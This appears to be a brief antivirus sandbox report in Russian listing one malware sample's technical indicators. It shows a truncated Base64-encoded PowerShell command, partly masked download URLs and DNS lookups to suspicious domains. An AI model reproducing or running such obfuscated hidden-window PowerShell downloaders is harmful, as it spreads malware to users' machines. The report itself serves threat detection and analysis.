Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAEIAUABFAFEAcwBlAHoAPQAnAEYAWgBSAFoARQBvAG0AYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAGAAUgBgAGkAdABZAHAAUgBgAG8AYABUAE8AYwBPAGwAIgAgAD...
- http://co####nesalmar.com/urpvz/GvLR7M5O11/
- http://ba###music.com/ratqc/vMtD48/
- http://rc####.itulstaging.com/wp-admin/po5jW/
- DNS ASK co####nesalmar.com
- DNS ASK zc#y.cn
- DNS ASK ba###music.com
- DNS ASK au####.ledgr.xyz
- DNS ASK rc####.itulstaging.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABSAEIAUABFAFEAcwBlAHoAPQAnAEYAWgBSAFoARQBvAG0AYQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYwBVAGAAUgBgAGkAdABZAHAAUgBgAG8AYABUAE8AYwBPAGwAIgAgAD...' (со скрытым окном)